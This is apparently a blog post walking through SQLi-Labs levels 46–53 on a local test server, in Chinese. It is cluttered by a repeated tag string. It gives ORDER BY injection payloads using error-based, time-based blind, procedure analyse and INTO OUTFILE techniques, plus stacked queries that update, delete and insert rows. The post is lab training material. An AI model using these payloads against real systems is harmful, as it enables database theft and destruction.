less-46-47-48-49-50-51-52-53

LESS-46less-46-47-48-49-50-51-52-53
1、order by的原理为排序,所以通过sort+asc或desc的输出是否相同便可知是否有使用到排序(ASC 代表结果会以由小往大的顺序列出,而 DESC 代表结果会以由大往小的顺序列出。如果两者皆没有被写出的话,那我们就会用 ASC。)

输入?Sort=1 descless-46-47-48-49-50-51-52-53
输入:?Sort=1 ascless-46-47-48-49-50-51-52-53
两者不同说明这里使用了order byless-46-47-48-49-50-51-52-53
1、报错注入
输入:http://127.0.0.1/sqlilabs/Less-46/?sort=1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’ ),0x7e))–+less-46-47-48-49-50-51-52-53
2、延时注入:http://127.0.0.1/sqlilabs/Less-46/?sort=1 and if(ascii(substr(database(),1,1))=115,1,sleep(5))–+less-46-47-48-49-50-51-52-53
(2)利用 procedure analyse 进行注入
procedure analyse 参数后注入,利用 procedure analyse 参数,我们可以执行报错注入。同时,在 procedure analyse 和 order by 之间可以存在 limit 参数,less-46-47-48-49-50-51-52-53
输入:http://127.0.0.1/sqlilabs/Less-46/?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)less-46-47-48-49-50-51-52-53
(3)输出导入导出
http://127.0.0.1/sqlilabs/Less-46/?sort=1 into outfile “c://phpStudy//PHPTutorial//www//sqlilabs//Less-46//bb.txt”%23less-46-47-48-49-50-51-52-53less-46-47-48-49-50-51-52-53
Less-47

与上一题不同的是sql语句中有单引号闭合。
(1)报错注入
输入:http://127.0.0.1/sqlilabs/Less-47/?sort=1’ and extractvalue(1,concat(0x7e,(select database()),0x7e))–+less-46-47-48-49-50-51-52-53(2)延时注入
输入:http://127.0.0.1/sqlilabs/Less-47/?sort=1’ and if(ascii(substr(database(),1,1)) =115,0,sleep(5))–+less-46-47-48-49-50-51-52-53
(3)procedure analyse输入:http://127.0.0.1/sqlilabs/Less-47/?sort=1’ %20%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)–+less-46-47-48-49-50-51-52-53
LESS-48
本关与LESS-46相似但是没有报错输出,故不能用报错注入,其他相同,不详写
less-46-47-48-49-50-51-52-53
(1)延时注入
http://127.0.0.1/sqlilabs/Less-48/?sort=1 and if(ascii(substr(database(),1,1))=115,0,sleep(5))–+less-46-47-48-49-50-51-52-53
LESS-49
本题与47题相似但是没有报错注入,不详写less-46-47-48-49-50-51-52-53LESS-50
less-46-47-48-49-50-51-52-53
执行 sql 语句我们这里使用的是 mysqli_multi_query()函数,而之前我们使用的是 mysqli _query(),区别在于 mysqli_multi_query()可以执行多个 sql 语句,而 mysqli_query()只能执行一个 sql 语句,那么我们此处就可以执行多个 sql 语句进行注入,也就是我们之前提到的 statcked injection。 (可参考38题解释)

(1)输入:http://127.0.0.1/sqlilabs/Less-50/?sort=1 ; update food set username=‘world’ where id=2 --+less-46-47-48-49-50-51-52-53less-46-47-48-49-50-51-52-53Less-51
less-46-47-48-49-50-51-52-53
与上一题的区别为这里为单引号闭合
输入:http://127.0.0.1/sqlilabs/Less-51/?sort=1’ ; delete from food where id=‘3’–+less-46-47-48-49-50-51-52-53less-46-47-48-49-50-51-52-53LESS-52less-46-47-48-49-50-51-52-53
此处与less-50的区别为,这里没有报错输出
输入:http://127.0.0.1/sqlilabs/Less-52/?sort=1 ; insert into food(id,price,username) values (3,40,‘feel’)–+less-46-47-48-49-50-51-52-53Less-53
这里和51题的区别为,虽都为单引号闭合但是此处没有报错输出;less-46-47-48-49-50-51-52-53
Less-53
这里和51题的区别为,虽都为单引号闭合但是此处没有报错输出;less-46-47-48-49-50-51-52-53
输入:http://127.0.0.1/sqlilabs/Less-53/?sort=1’ ; create table hello like users; less-46-47-48-49-50-51-52-53less-46-47-48-49-50-51-52-53

相关文章:

  • 2021-12-23
  • 2021-05-17
  • 2021-09-11
  • 2021-09-14
  • 2021-12-02
  • 2021-06-12
  • 2021-06-22
猜你喜欢
  • 2021-04-21
  • 2021-04-02
  • 2021-08-27
  • 2021-09-20
  • 2021-06-13
  • 2021-04-25
相关资源
相似解决方案
热门标签
Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode